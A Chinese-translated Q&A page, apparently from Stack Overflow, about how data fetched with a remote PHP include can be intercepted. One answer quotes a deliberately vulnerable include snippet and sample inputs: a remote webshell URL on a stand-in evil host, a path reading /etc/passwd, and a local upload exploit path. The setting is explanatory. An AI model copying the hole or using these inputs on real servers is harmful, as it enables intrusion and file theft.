我在这个问题中看到了它:
Including a remote php file as a resource
那么有人如何“拦截”(并修改?)正在发送/接收的数据? (在那个问题中,它是一个用fopen读取的远程PHP文件)
答案 0 :(得分:2)
您可能需要阅读有关Man-in-the-middle attacks的维基百科文章。
PeeHaa指出,您可以使用HTTPS通过SSL / TLS加密HTTP流。
MITM攻击不是特定于HTTP的问题。此问题会影响流经不受信任网络的所有通信。
答案 1 :(得分:1)
来自Wikipedia的这个例子可能会让你认识到这种不良影响。
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>
COLOR = http://evil.example.com/webshell.txt - 注入包含恶意代码的远程托管文件
COLOR = / etc / passwd - 允许攻击者在UNIX系统目录遍历中读取passwd文件的内容
/vulnerable.php?COLOR=C:\ftp\upload\exploit - 执行已上传文件中名为exploit.php(本地文件包含漏洞)的代码
我希望从这些例子中,潜伏的危险对你来说更清楚。
“脚本之外的不受信任的数据需要验证”以缓解这些攻击。